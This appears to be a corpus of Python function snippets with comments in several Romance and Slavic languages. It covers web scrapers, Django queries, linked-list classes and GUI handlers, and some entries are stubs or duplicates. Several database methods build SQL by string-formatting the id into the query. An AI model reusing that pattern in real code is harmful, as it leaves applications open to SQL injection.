3d.. 
subtitulada o no.\n\t\tpeli_query = Pelicula.objects.filter(alt_tit__icontains=tit, tres_D=tres_D)\n\t\tif len(peli_query) > 1:\n\t\t\t#Si idioma == ingles, selecciona la pelicula subtitulada\n\t\t\tpelicula = peli_query.filter(subtitulada= (idioma == 'ingles') )\n\t\telif len(peli_query) == 1:\n\t\t\tpelicula = peli_query[0]\n\t\telse:\n\t\t\tlogger.debug( \"No se encontro pelicula %s\" % titulo\t\t)\n\t\t\t\n\t\thoras_html = peli.find('div', id='horax')\n\t\tplatino_b= False\t\t\n\t\tfor tag in horas_html.contents:\n\t\t\t#Me salto todo lo que no es html\n\t\t\tif type(tag) != NavigableString:\t\t\n\t\t\t\t#En caso de que sea funciones de platino\n\t\t\t\tif tag.name == 'center':\n\t\t\t\t\tplatino_b = True\n\t\t\t\t\tfuncion_name = ''.join(tag.findAll(text=True)).strip()\n\t\t\t\t\tif funcion_name.find('Platino') > -1:\n\t\t\t\t\t\t#Ajustar el complejo para platino\n\t\t\t\t\t\tcomplejo = complejo_platino\n\t\t\t\t\t\t\n\t\t\t\telif tag.get('style','').find('border-bottom: 1px solid rgb(238, 207, 0);') > -1:\n\t\t\t\t\t#Ajustar de regreso el complejo normal\n\t\t\t\t\tcomplejo = complejo_org\n\t\t\t\t\tplatino_b = False\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t#Si es renglon de hora y no algo mas como <br/>\t\t\t\n\t\t\t\tif tag.name== 'div' and tag.get('id','') == 'general':\n\t\t\t\t\tfecha = parseDate(tag.find('div', id=fecha).string)\n\t\t\t\t\tfunciones.extend(\n\t\t\t\t\t\t[{\n\t\t\t\t\t\t\t'pelicula': pelicula,\n\t\t\t\t\t\t\t'complejo': complejo,\n\t\t\t\t\t\t\t'hora': datetime.datetime(fecha.year, fecha.month, fecha.day, *time.strptime( hora_html.string , '%H:%M')[3:5]),\n\t\t\t\t\t\t\t'pol_idShowTime': show_exp.search(hora_html['href']).group(1),\n\t\t\t\t\t\t\t} for hora_html in tag.find('div', id='funciones').find('a', 'texto_1')]\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t)\n\t\t\t\t\t#logger.debug( funciones)\n\treturn funciones", "def obtenerObra(self):\n rowActual = self.tableOs.currentItem().row()\n self.lineRazon.setText(str(self.tableOs.item(rowActual,0).text()))\n self.lineRazon.setEnabled(False)\n self.obraSocial=str(self.tableOs.item(rowActual,0).text())\n self.lineCuit.setText(str(self.tableOs.item(rowActual,1).text()))\n self.lineCuit.setEnabled(False)\n self.tableOs.setEnabled(False)\n self.gbFactura.setEnabled(True)\n self.gbNotaCredito.setEnabled(True)", "def __init__(self, lista_enlazada): \n\t\tself.lista = lista_enlazada\n\t\tself.anterior = None\n\t\tself.actual = lista_enlazada.prim\n\t\tself.pila_anteriores = Pila()\n\t\tself.posicion = 0", "def obter_caminho(self):\n return self.caminho", "def scraper_voto(self):\n\n #per trovare il link a fantacalcio.it devo prima trovare il link della squadra e trovare il suo nome\n soup_rosa = BeautifulSoup(\n requests.get(f\"{self.LINK_FANTACALCIO_IT}/{self.team}#rosa\").text,\n \"html.parser\",\n )\n print(self.name)\n\n displayed_name = self.name\n if displayed_name == \"Coulibaly\": # caso estremo, il sito si confonde\n displayed_name = \"Coulibaly M.\"\n\n # trovo il link personale del giocatore e glielo assegno\n link = soup_rosa.find(\"a\", text=displayed_name.upper())[\"href\"]\n self.scheda_giocatore = link\n\n # leggo voto e media voto\n soup = BeautifulSoup(requests.get(link).text, \"html.parser\")\n\n self.media_voto = float(soup.find_all(class_=\"nbig2\")[0].text.replace(\",\", \".\"))\n self.media_fantavoto = float(\n soup.find_all(class_=\"nbig2\")[1].text.replace(\",\", \".\")\n )\n\n # leggo anche il ruolodalla schedina delle info\n infos = soup.find_all(class_=\"col-lg-6 col-md-6 col-sm-12 col-xs-12\")[-2]\n self.ruolo = 
str(infos.find(\"span\").text)\n\n # compilo i dati: partite, gol e assist\n dati_partite = soup.find_all(class_=\"nbig\")\n\n partite = \"🥅 \" + dati_partite[0].text\n # i portieri hanno statistiche diverse!\n if self.ruolo == \"P\":\n goal = \"❌ \" + dati_partite[1].text\n self.dati = \"<br>\".join([partite, goal])\n else:\n goal = \"⚽ \" + dati_partite[1].text\n assist = \"👟 \" + dati_partite[2].text\n self.dati = \"<br>\".join([partite, goal, assist])\n\n # aggiungo stellina al nome se hanno una bella media voto\n if self.media_fantavoto > 7:\n self.name += \" ⭐\"", "def removeItem(self, valor):\n if not self.esta_vazia():\n ## Os dois ponteiros apontam pro primeiro elemento da lista\n elementoAnterior = self._cabeca\n elementoAtual = self._cabeca\n while True:\n ## Se o elemento for encontrado\n if elementoAtual._inteiro == valor:\n while elementoAtual._inteiro == valor:\n if elementoAtual == elementoAnterior:\n ## Se o elemento a ser removido é o primeiro\n self.removeInicio()\n elementoAnterior = self._cabeca\n elementoAtual = self._cabeca\n else:\n elementoAnterior._proximo = elementoAtual._proximo\n elementoAnterior._proximo._anterior = elementoAnterior\n elementoAtual = elementoAnterior._proximo\n if elementoAtual == self._cabeca:\n break\n break\n else:\n ## se o elemento não foi encontrado ainda\n if elementoAnterior != elementoAtual:\n ## Avança o ponteiro que marca o nó anterior apenas quando não é a primeira passagem\n ## do Loop (os dois ponteiros já estão diferentes)\n elementoAnterior = elementoAnterior._proximo\n ## de qualquer forma avança o ponteiro para o atual\n elementoAtual = elementoAtual._proximo\n ## Testar se o elemento buscado não existe\n if elementoAtual == self._cabeca:\n break\n return None", "def cargar_atril(self,lista,bolsa):\n self.atril = lista\n self.bolsa = bolsa", "def __carta(soup):\n news = []\n container = soup.find('dd', id='fieldset-maisacessadas-semana')\n most_read = container.find_all('li')\n\n for item in most_read:\n news.append(dict(title=item.a.string, link=item.a['href']))\n return news", "def __carta(soup):\n news = []\n container = soup.find('dd', id='fieldset-maisacessadas-semana')\n most_read = container.find_all('li')\n\n for item in most_read:\n news.append(dict(title=item.a.string, link=item.a['href']))\n return news", "def mezclar_bolsa(self):", "def get_posicion(self):\n return self.posicion", "def first(self):\n if self.is_empty():\n raise Empty(\"Deque está vacío\")\n return self._header._next._element # un artículo real justo después de la cabecera", "def afficher(dico):\n return dico", "def retirer_objet(self, nom_membre):\n membre = self.get_membre(nom_membre)\n objet = membre.tenu\n membre.tenu = None", "def __init__(self):\n self.enfila= 0\n self.fila = []", "def atributo_complejidad():\n tipo_defecto = ItemTipos.objects.filter(es_supertipo=True)\n if tipo_defecto.count() > 0:\n attr1 = ItemAtributos.objects.filter(nombre='complejidad').\\\n filter(idtipoitem=tipo_defecto)\n return attr1\n return None", "def elemento_actual(self):\n\t\tif not self.actual:\n\t\t\treturn None\n\t\treturn self.actual.dato", "def pretraga_po_cijeni(self, lst, broj):\n pretrazeno = []\n for i in lst:\n if i.cijena == broj:\n pretrazeno.append(i)\n return pretrazeno", "def elems(self):", "def mostrEmpl2(finalData): #Esta sección fue hecha por Ángel\n listaUE = []\n for elemento in finalData:\n nombre = elemento[0]\n listaUE.append(nombre) \n return listaUE", "def get_contenu(self):\n return self.objets", "def get_first_item(self):\n params = 
urllib.parse.urlencode({'o':'1', 'q':self.query})\n url = 'https://www.leboncoin.fr/annonces/offres/ile_de_france/?{:s}'.format(params) # Cree l'url de recherche en get\n html = urllib.request.urlopen(url)\n if url != html.geturl():\n return None\n soup = BeautifulSoup.BeautifulSoup(html, 'html5lib')\n try:\n products = soup.section.find_all('a', 'list_item clearfix trackable')\n except Exception as e:\n print('Nothing found on leboncoin')\n return None\n for product in products: # recupere les differentes informations de chaque produit\n if str(product.section.h2).strip() == 'None':\n continue\n name = product.section.h2.contents[0].strip()\n price = self.__get_price(product)\n link = 'http:' + product['href']\n return (name, price, link)\n return None", "def _pega_no(self, index):\n ponteiro = self.inicio\n for i in range(index):\n if ponteiro:\n ponteiro = ponteiro.prox\n else:\n raise IndexError(\"list index out of range\")\n return ponteiro", "def __init__(self):\n self.tours = []\n self.grille = Grille()", "def retroceder(self):\n\t\tif self.pila_anteriores.esta_vacia(): \n\t\t\traise StopIteration(\"Esta al principio.\")\n\t\tself.actual = self.anterior\n\t\tself.anterior = self.pila_anteriores.desapilar()\n\t\tself.posicion -= 1\n\t\treturn self.actual.dato", "def carregarTurma(self, ide):\r\n self.__id = str(ide)\r\n self.cursor.execute(\"SELECT * FROM TURMA WHERE ID = %s;\" %(self.__id))\r\n if self.cursor.rowcount == 1:\r\n return self.cursor.fetchone()\r\n else:\r\n return None", "def ustal_kon(self, f):\n kon= Kon.objects.using(settings.DBS(self.firma)).filter(id= f.nip_nabywcy)\n if kon:\n return kon[0]\n \n kon= Kon()\n \n # Numer dla zagranicznego\n nr_kon= Kon.objects.using(settings.DBS(self.firma)).exclude(nr_kon__startswith= 'Z').aggregate(Max('nr_kon'))\n kon.nr_kon= '{:05d}'.format(int(nr_kon['nr_kon__max'].strip())+1)\n\n if '/' in f.nazwa_nabywcy:\n kon.skrot, kon.nazwa= f.nazwa_nabywcy.split('/')\n else:\n kon.nazwa= f.nazwa_nabywcy\n \n kon.id= f.nip_nabywcy\n kon.idtyp= 'NIPUE' if re.match('[A-Z][A-Z]', f.nip_nabywcy) else 'NIP'\n kon.ulica, kon.kod, kon.miejsc= self.adres_kon(f.adres_nabywcy)\n \n kon.kraj= f.nip_nabywcy[:2] if re.match('[A-Z][A-Z]', f.nip_nabywcy) else 'PL'\n \n kon.id_obcy= f.id # zapamiętanie skąd się zwiął (faktura)\n \n kon.skrot= su(kon.skrot)\n kon.nazwa= su(kon.nazwa)\n kon.miejsc= su(kon.miejsc)\n kon.ulica= su(kon.ulica)\n \n kon.kiedy= datetime.date.today() # data utworzenia\n kon.data_us= kon.kiedy\n if f.termin_platnosci and f.data_wystawienia:\n kon.term_zap= (f.termin_platnosci - f.data_wystawienia).days\n \n kon.save(using= settings.DBS(self.firma))\n \n return kon", "def incarcaPieseMozaic(params):\n \n print('Incarcam piesele pentru mozaic din director.')\n\n pieseMozaic = []\n # for img_path in sorted(glob.glob(params.numeDirector\n # + '*.'\n # + params.tipImagine),\n # key=lambda name: int(name[len(params.numeDirector)\n # :-4])):\n for img_path in glob.glob(params.numeDirector\n + '*.'\n + params.tipImagine):\n img = cv2.imread(img_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n pieseMozaic.append(img)\n pieseMozaic = np.array(pieseMozaic)\n\n if params.afiseazaPieseMozaic:\n # afiseaza primele 100 de piese ale mozaicului\n if pieseMozaic.shape[0] < 100:\n raise Exception(\"Numarul de piese este mai mic decat 100!\")\n\n plt.figure()\n plt.suptitle('Primele 100 de piese ale mozaicului sunt:')\n idxImg = 0\n for i in range(10):\n for j in range(10):\n idxImg += 1\n plt.subplot(10, 10, idxImg)\n plt.axis('off')\n 
plt.imshow(pieseMozaic[idxImg - 1])\n\n plt.show()\n\n # gray image\n if params.imgReferinta.shape[2] == 1:\n pieseMozaicG = []\n for i in range(pieseMozaic.shape[0]):\n img = cv2.cvtColor(pieseMozaic[i], cv2.COLOR_RGB2GRAY)\n img = img[:, :, None]\n pieseMozaicG.append(img)\n pieseMozaicG = np.array(pieseMozaicG)\n params.pieseMozaic = pieseMozaicG\n else:\n params.pieseMozaic = pieseMozaic\n\n if params.hexagon == 1:\n params = getHexagonMatrix(params,\n pieseMozaic[0].shape[0],\n pieseMozaic[0].shape[1])\n\n return params", "def get(self, el):\n raise Exception('TODO IMPLEMENT ME !')", "def __init__(self):\n mi_parqueo = list()", "def busqueda_por_atributo(self, atributo, valor):\n\n paquetes = []\n\n if atributo == \"Número de dormitorios\":\n for casa in self.casas:\n if casa.numero_dormitorios >= valor:\n for paquete in casa.paquetes():\n paquetes.append(paquete)\n if atributo == \"Número de baños\":\n for casa in self.casas:\n if casa.numero_banos >= valor:\n for paquete in casa.paquetes():\n paquetes.append(paquete)\n if atributo == \"Numero de cocinas\":\n for casa in self.casas:\n if casa.numero_cocinas >= valor:\n for paquete in casa.paquetes():\n paquetes.append(paquete)", "def an_element(self):\n return self.a_realization().an_element()", "def _buscar_autos(self, placa):\n for auto in self.mi_parqueo:\n if str(auto.placa) == str(placa):\n return auto\n \n return None", "def __init__(self):\n self.modelo = [\"A\", \"sucio\", \"sucio\",\"sucio\", \"sucio\",\"sucio\", \"sucio\"]", "def __iter__(self):\n return _Iter_Ciudad_(self.aeropuertos)", "def arredonda(elemento):\n chave, mm = elemento\n return (chave,round(mm,1))", "def returnIdAluno(self):\r\n self.cursor.execute(\"SELECT MATRICULA FROM ALUNO;\")\r\n self.__result = self.cursor.fetchall()\r\n self.__lista = []\r\n try:\r\n for self.__i in self.__result:\r\n self.__lista.append(self.__i[0])\r\n return self.__lista\r\n except:\r\n return []", "def entrer(self):\n valeur = getattr(self.objet, self.attribut, None)\n if valeur is None:\n setattr(self.objet, self.attribut, [])", "def valorEsperado(obs,ket):\n cal=Calculadora()\n obsSobreket=cal.accion(obs,ket)\n bra=cal.matrizConjugada(obsSobreket)\n ket1=cal.transpuesta([ket])\n bra1=cal.transpuesta(bra)\n car=cal.multiplicacionMatrizMatriz(bra1,ket1)[0][0]\n return car", "def element(self):\n return self._element", "def cargarObra(self):\n rowActual=self.tableObra.currentItem().row()\n self.lineObra.setText(str(self.tableObra.item(rowActual,0).text()))\n self.lineCuit.setText(str(self.tableObra.item(rowActual,1).text()))\n self.tableObra.hide()\n self.lineObra.setEnabled(False)\n self.lineCuit.setEnabled(False)\n self.obraSocialSeleccionada = str(self.lineObra.text())\n self.cargar_productos(self.obraSocialSeleccionada)\n self.gbProducto.setVisible(True)", "def test_recupera_un_solo_elemento(self):\n detalle = reverse(\"musica:detail\", kwargs={\"pk\": self.musica1.id})\n respuesta = self.client.get(detalle)\n # print(respuesta.data['id'])\n self.assertEqual(200, respuesta.status_code)\n valor_consulta = Musica.objects.get(id=respuesta.data[\"id\"])\n # print(valor_consulta)\n self.assertEqual(respuesta.data[\"cancion\"], valor_consulta.cancion)\n self.assertEqual(respuesta.data[\"artista\"], valor_consulta.artista)\n self.assertEqual(respuesta.data[\"año\"], str(valor_consulta.año))", "def carregarAluno(self, matricula):\r\n try:\r\n self.__id = int(matricula)\r\n self.cursor.execute(\"SELECT * FROM ALUNO WHERE MATRICULA = %s;\" %(self.__id))\r\n if self.cursor.rowcount == 
1:\r\n return self.cursor.fetchone()\r\n else:\r\n return None\r\n except:\r\n return None", "def getSituacaoAeroporto(self):\n soup = BeautifulSoup(self.getContent(url_direct.get('dash-aero-situacao')))\n list_situation = []\n for aeport in self.list_aeport.keys():\n element = soup.findAll('li', {'id': aeport})[0]\n name_class = element.get('class')[0]\n list_aeport = self.list_aeport.get(aeport)\n list_situation.append({'sigla': aeport,\n 'name': list_aeport.get('name'),\n 'local': list_aeport.get('local'),\n 'codigo': list_aeport.get('codigo'),\n 'status': self.situation_aeport.get(name_class),\n 'name_class': name_class,\n 'site': list_aeport.get('site')})\n return list_situation", "def documento(self):\n return self.persona.documento", "def get(self, index):\n if self.head is None:\n raise Exception('Node vide')\n else:\n return self.leonardo_recurs(index, self.head)", "def __getitem__(self, nom_canal):\n return self._canaux[nom_canal]", "def minimo(self, no):\n if no is not None:\n while no.getEsquerdo() is not None:\n no = no.getEsquerdo()\n return no", "def getPrincipal(self):\n try:\n self.soup = BeautifulSoup(self.getContent(url_direct.get(\"ex-clima-media\")))\n temp_media = self.getTempMedia()\n hour = localtime(time()).tm_hour\n self.soup = BeautifulSoup(self.getContent(url_direct.get(\"ex-clima\")))\n prevision = self.getHour(hour)\n\n content = '<ul id=\"servicos-externos\" style=\"display: block;\">' \\\n '<li class=\"ex-clima\"><div class=\"dash-border\"><strong class=\"titulo-dash\">Tempo' \\\n '</strong><div class=\"tempo-g nb\"></div><div class=\"t-media\"><span>Média</span>' \\\n '<span id=\"CGE-media\" class=\"amarelo bold\">' + temp_media + '</span></div><div class=\"tempestade\">' \\\n '<span>Potencial <div class=\"raio\"></div></span>' \\\n '<span id=\"status-temp\" class=\"amarelo\">' + prevision + '</span></div></div>' \\\n '<div class=\"ex-hover\"><div></div></div></li>'\n except:\n content = self.getContentExcept(class_li='ex-clima', text_div='CGEb')\n\n try:\n self.soup = BeautifulSoup(self.getContent(url_direct.get('qualidade-oxigenio')))\n qualidade_ar = self.getDescQualidade()\n content += '<!-- AR -->' \\\n '<li class=\"ex-ar\"><div class=\"dash-border\"><strong class=\"titulo-dash\">Qualidade do Ar</strong>'\\\n '<div class=\"dash-img o2quali\"></div><b class=\"bullet-verde em2\">' + qualidade_ar + '</b></div>' \\\n '<div class=\"ex-hover\"><div></div></div></li>'\n except:\n content += self.getContentExcept(class_li='ex-ar', text_div='Qualidade do Ar')\n\n content += '<!-- Aeroportos -->' \\\n '<li class=\"ex-aero\">' \\\n '<div class=\"dash-border\"><strong class=\"titulo-dash\">Aero</strong>' \\\n '<br>Consultar situação</div>' \\\n '</li>'\n\n content += '<!-- Transporte público -->' \\\n '<li class=\"ex-publico\">' \\\n '<div class=\"dash-border\">' \\\n '<strong class=\"titulo-dash\">Transporte Público</strong>' \\\n '<div class=\"dash-img\"></div>' \\\n '<a href=\"http://www.sptrans.com.br/itinerarios/\" target=\"_blank\" class=\"azul-pq\">Busca de itinerários</a>' \\\n '</div>' \\\n '<div class=\"ex-hover\"><div></div></div>' \\\n '</li>'\n\n try:\n self.soup = BeautifulSoup(self.getContent(url_direct.get('transito-agora')))\n lentidao = self.getLentidao()\n content += '<!-- Trânsito-->' \\\n '<li class=\"ex-transito\"><div class=\"dash-border\"><strong class=\"titulo-dash\">' \\\n 'Trânsito</strong><div class=\"dash-img semaforo\"></div>' \\\n '<b class=\"amarelo em15\" id=\"lento\">' + lentidao + 'km</b><br>' \\\n '<span class=\"em09 bold\">de 
lentidão</span><br><span class=\"kmStatus verde\">' \\\n '<i class=\"ball-status verde\"></i>livre</span></div><div class=\"ex-hover\"><div></div></div></li>'\n except:\n content += self.getContentExcept(class_li='ex-transito', text_div='Transito')\n\n try:\n self.soup = BeautifulSoup(self.getContent(url_direct.get('dash-rodisio')))\n placa_rodisio = self.getRestricaoPlacaFinal()\n content += '<!-- Rodizio -->' \\\n '<li class=\"ex-rodizio\">' \\\n '<div class=\"dash-border\"><strong class=\"titulo-dash\">Rodízio</strong>' \\\n '<div class=\"dash-img\"></div><b id=\"rodizio_hoje\"></b>Placas final <br>' \\\n '<b class=\"azul-gd\">' + placa_rodisio + '</b> </div><div class=\"ex-hover\">' \\\n '<div></div></div>' \\\n '</li></ul>'\n except:\n content += self.getContentExcept(class_li='ex-rodizio', text_div='Rodízio')\n return content", "def obtener_peso_arista(self, v, w):\n return self.vertices[v][w]", "def __correio(soup):\n news = []\n json_content = json.loads(soup.text)\n entries = json_content[\"matia\"]\n\n for entry in entries:\n title = entry[\"title\"]\n url = entry[\"link\"]\n news.append(dict(title=title, link=url))\n if(len(news) >= 10):\n break\n\n return news", "def es_satisfecho_por(self, candidata):", "def cargar_bolsa(self,lista):\n self.bolsa = lista", "def index(self, elem):\n ponteiro = self.inicio\n i = 0\n while(ponteiro):\n if ponteiro.dado == elem:\n return i\n ponteiro = ponteiro.prox\n i = i + 1\n raise ValueError(\"{} is not in list\".format(elem))", "def __init__(self):\n self.tiempos = ListaEnlazada() # Marcas de tiempo\n self.tracks = [] # Lista de tracks", "def __init__(self):\n\t\tself.Nombre = \"\"\n\t\tself.Apellido = \"\"\n\t\tself.Edad = \"\"\n\t\tself.Sexo = \"Masculino\"\n\t\t\"\"\"Fecha de la carga del paciente dentro del software\"\"\"\n\t\tself.Fecha = strftime(\"%H : %M : %S\", gmtime())\n\t\t\"\"\"Estudio a realizar sobre la muestra\"\"\"\n\t\tself.Test = \"GLU\"\n\t\t\"\"\"Numero identificatorio unico de paciente en estudio\"\"\"\n\t\tself.ID = 0\n\t\t\"\"\"Posicion dentro del carrusel de muestras\"\"\"\n\t\tself.Posicion = \"\"\n\t\t\"\"\" La prioridad tiene dos estados: Es \"True\" si se requiere \n\t\tque el estudio para este paciente sea \n\t\trealizado inmediatamente \"\"\"\n\t\tself.Prioridad = False\n\t\t\"\"\" Boton desactivado de informe \"\"\"\n\t\tself.Informe = GdkPixbuf.Pixbuf.new_from_file('./Glade/botonnodisponible2.png')\n\t\t\"\"\"Resultado\"\"\"\n\t\tself.Resultado = \"5 g/ml\"\n\t\t\"\"\"Valor inicial de la barra de progreso\"\"\"\n\t\tself.Progreso = 1", "def buscaPalavras(self):\n dataSet=self.stemmerAplay()\n todasPalavras =[]\n for (notice, clazz) in dataSet:\n todasPalavras.extend(notice)\n return todasPalavras", "def particle(lieu):\r\n\r\n path = \"https://air.plumelabs.com/fr/live/{}\".format(lieu)\r\n request_html = requests.get(path)\r\n page = request_html.content\r\n soup = BeautifulSoup(page, \"html.parser\")\r\n\r\n liste = []\r\n propriete = soup.find_all(\"div\")\r\n for i in propriete:\r\n liste.append(i.get_text())\r\n\r\n\r\n liste_e = liste[20:21]\r\n pollute = liste_e[0][31:34]\r\n\r\n return pollute", "def _getConteudoPublicado(self, id_conteudo=None, mkl=None):\n conteudo = None\n for conteudo in self.execSql(\"select_dados\",\n id_conteudo=int(id_conteudo)):\n break\n\n if conteudo:\n soup = BeautifulSoup(conteudo[\"regulamento\"],\n fromEncoding=settings.GLOBAL_ENCODING)\n for a in soup.findAll(\"a\"):\n href = unquote(a.get(\"href\", \"\")).strip()\n if href.startswith(\"#h2href:\"):\n kingkong, dados = 
href.split(\"#h2href:\", 1)\n if mkl:\n href, attrs = mkl(dados=decode(dados))\n for i in attrs.keys():\n a[i] = attrs[i]\n else:\n href = self._renderLink(dados=dados)\n\n if href.find(\"javascript\") >= 0:\n href = href.replace(\"[target=blank]\", \"\")\n elif href.find(\"target=blank\") >= 0:\n href = href.replace(\"[target=blank]\", \"\")\n a[\"target\"] = \"blank\"\n\n a[\"href\"] = href\n conteudo[\"regulamento\"] = unquote( unicode(soup) )\n \n soup = BeautifulSoup(conteudo[\"descricao\"],\n fromEncoding=settings.GLOBAL_ENCODING)\n for a in soup.findAll(\"a\"):\n href = unquote(a.get(\"href\", \"\")).strip()\n if href.startswith(\"#h2href:\"):\n kingkong, dados = href.split(\"#h2href:\", 1)\n if mkl:\n href, attrs = mkl(dados=decode(dados))\n for i in attrs.keys():\n a[i] = attrs[i]\n else:\n href = self._renderLink(dados=dados)\n\n if href.find(\"javascript\") >= 0:\n href = href.replace(\"[target=blank]\", \"\")\n elif href.find(\"target=blank\") >= 0:\n href = href.replace(\"[target=blank]\", \"\")\n a[\"target\"] = \"blank\"\n\n a[\"href\"] = href\n conteudo[\"descricao\"] = unquote( unicode(soup) )\n conteudo[\"campos\"] = [i for i in self.execSql(\"select_conteudo_campos\",\n id_conteudo=int(conteudo[\"id_conteudo\"]))]\n return conteudo", "def __init__(self, altura, peso, edad):\n\t\tself.altura = altura # OJO TODAS LAS VARIABLES SON PUBLICAS \n\t\tself.peso = peso \n\t\tself.edad = edad\n\t\tself.profesion = \"\" # esta la inicializamos nosotros\n\t\tself.lista_tareas = []\n\t\tself.__privado = 1 # este atributo es privado no podemos acceder a el desde fuera", "def retireSommet(self, sommet):\r\n nouveauGraphe = copy.deepcopy(self) # on effectue une copie du graphe\r\n nouveauGraphe.n = self.n-1 # On a n-1 points\r\n # NB: il faut aussi changer m et listeArretes mais on va pas le faire tout de suite car pas urgent\r\n # 1. On suprrime la ligne d'indice sommet\r\n #* AUTRE MÉTHODE del nouveauGraphe.adjMatrix[sommet]\r\n # print(nouveauGraphe.adjMatrix)\r\n nouveauGraphe.adjMatrix.pop(sommet)\r\n # print(nouveauGraphe.adjMatrix)\r\n #2. 
On supprime la colonne d'indice sommet = on supprime l'index sommet de chaque sous liste\r\n # la liste comprehension ne marche pas bien :(\r\n for line in nouveauGraphe.adjMatrix:\r\n line.pop(sommet)\r\n # print(nouveauGraphe.adjMatrix)\r\n # nouveauGraphe.m = 0\r\n # 2ème méthode:\r\n # for ligne in nouveauGraphe.adjMatrix:\r\n # ligne.pop(sommet)\r\n return nouveauGraphe", "def avanzar(self):\n\t\tif (not len(self.lista)) or (self.esta_al_final()): \n\t\t\traise StopIteration(\"Esta al final.\")\n\t\tself.pila_anteriores.apilar(self.anterior)\n\t\tself.anterior = self.actual\n\t\tself.actual = self.actual.prox\n\t\tself.posicion += 1\n\t\treturn self.actual.dato", "def get_info_materia(codigo):\n\n materia = {}\n\n codigo = codigo.replace('.', '')\n d = pq(requests.get(URL_MATERIA.format(materia=codigo)).text)\n materia['nombre'] = d('#principal h3').text().replace(\n 'Cursos de la materia ', '')\n\n materia['cursos'] = []\n for tr in d('#principal tr'):\n pq_curso = pq(tr)\n profesor = pq_curso('.tablaitem:eq(2)').text()\n\n if profesor:\n materia['cursos'].append({'profesor': profesor,\n 'clases': _get_clases(pq_curso)})\n\n return materia", "def obtem_fila(self):\n\n return self.fila", "def getSituacaoAeroportoVoo(self, list_aeport=[]):\n soup = BeautifulSoup(self.getContent(url_direct.get('dash-aero')))\n aeport = None\n for aeport in list_aeport:\n aeport_status = soup.find('td', text=aeport.get('local'))\n if aeport_status:\n _aeport_status = aeport_status.parent.findAll('span')\n aeport['atrasados'] = str(_aeport_status[0].text)\n aeport['cancelados'] = str(_aeport_status[8].text)\n else:\n aeport['atrasados'] = None\n aeport['cancelados'] = None\n return list_aeport", "def agregar_bolsa(self, letra, cantidad):", "def get_komponentu(self, naziv):\n return self.komponente[naziv]", "def listar_gabarito():\n return GabaritoProva.listar(gabarito)", "def cliquer_sur_unité(self):", "def scrape_cartelera(data, comp_nom):\t\n\tfunciones = []\n\t#limpia el html para no tener problemas:\n\tcleaner = Cleaner(page_structure=False)\n\tcleaned = cleaner.clean_html(data)\n\tsoup = BeautifulSoup(cleaned, convertEntities=BeautifulStoneSoup.HTML_ENTITIES)\n\tshow_exp = re.compile(r'sid=(\\d+)')\n\tsala_exp = re.compile(r'Sala (\\d{1,2})')\n\t\n\tcomplejo_org = Complejo.objects.get(nombre=comp_nom)\n\tcomplejo = complejo_org\n\tcomplejo_platino = None\n\t\n\t#Quita el nombre cinemex para encontrar comp platino\n\tnom_corto = comp_nom.replace('Cinemex ', '')\n\tcomplejos_l = Complejo.objects.filter(nombre__icontains=nom_corto, cadena='Cinemex')\n\t#Busca complejo platino:\n\tif len(complejos_l) > 1:\n\t\tnom = 'Cinemex Platino '+ nom_corto\n\t\tquery = complejos_l.filter(nombre=nom)\n\t\tif len(query): complejo_platino = query[0] \n\t\t\n\tpeliculas = []\n\tcontenido = soup.find('div', 'contenido2')\n\t\n\t#Si existe tabla de peliculas\n\tif contenido:\n\t\ttry:\n\t\t\tpeliculas = contenido.find('table', cellspacing='0', cellpadding='0', border='0').contents\n\t\texcept:\n\t\t\tlogger.debug( u'Error cargando complejo %s' %comp_nom)\n\t\t\treturn []\n\t\t\t#logger.debug( u'peliculas mide %s' %len(peliculas))\n\t\t\n\t\t\n\t\tfor peli in peliculas:\n\t\t\t#logger.debug( peli)\n\t\t\t#Asegura que no sea un navigableString\n\t\t\timax = False\n\t\t\tif type(peli) != NavigableString:\n\t\t\t\tif peli.find('div', 'texto_1', align='center'):\n\t\t\t\t\t#logger.debug( peli.b.string)\n\t\t\t\t\tif peli.b.string.find('Platino') > -1:\n\t\t\t\t\t\t#Ajustar el complejo para platino\n\t\t\t\t\t\tif 
complejo_platino:\n\t\t\t\t\t\t\timax = False\n\t\t\t\t\t\t\tcomplejo = complejo_platino\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tlogger.debug( u'Me falta platino %s' %comp_nom)\n\t\t\t\t\t\t\treturn funciones\n\t\t\t\t\t\t#logger.debug( 'Estoy en platino')\n\t\t\t\t\telif peli.b.string.find('IMAX')>-1:\n\t\t\t\t\t\timax = True\n\t\t\t\t\telse:\n\t\t\t\t\t\timax = False\n\t\t\t\t\t\tcomplejo= complejo_org\n\t\t\t\t\t\t\n\t\t\t\t#Si el td corresponde a una pelicula\n\t\t\t\tif peli.find('td', width='210', valign='top'):\t\n\t\t\t\t\ttres_D = False\n\t\t\t\t\tidioma = None\n\t\t\t\t\tsala = None\n\t\t\t\t\tpelicula = None\n\t\t\t\t\t\n\t\t\t\t\t#Checar tiene logo de 3d\n\t\t\t\t\tif peli.find('div', 'icono_platino').find('img', src=re.compile(r'3d.png$')): tres_D = True\n\t\t\t\t\t\n\t\t\t\t\t#Encabezado contiene titulo e idioma\n\t\t\t\t\tencabezado = peli.find('li', 'texto_3')\n\t\t\t\t\ttitulo = ''.join(encabezado.findAll(text=True)).replace('\\n', '').strip()\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t#Determina Idioma\n\t\t\t\t\tidi = encabezado.find('img', alt='idioma')\n\t\t\t\t\tif idi:\n\t\t\t\t\t\tif idi.get('src', '').find('ing') > 0:\n\t\t\t\t\t\t\tidioma = 'ingles'\n\t\t\t\t\telse:\n\t\t\t\t\t\tidioma = 'espanol'\n\t\t\t\t\t\t\n\t\t\t\t\t#Buscar pelicula por titulo segun idioma y 3d.. subtitulada o no.\n\t\t\t\t\t#logger.debug( u'titulo %s' %titulo)\n\t\t\t\t\ttit = '|'+ titulo + '|'\n\t\t\t\t\tpeli_query = filter_peli_ver(pelicula__alt_tit__icontains=tit, tres_D=tres_D, imax=imax)# id_mex__gt=0)\n\t\t\t\t\t#Checa si hay imax. \n\t\t\t\t\tlas_imax = peli_query.filter(imax=True)\n\t\t\t\t\tif las_imax:\n\t\t\t\t\t\tpeli_query= las_imax\n\t\t\t\t\t\tlogger.debug( 'Encontre imax!')\n\t\t\t\t\t\t\n\t\t\t\t\tif len(peli_query) > 1:\n\t\t\t\t\t\t#Si idioma == ingles, selecciona la pelicula 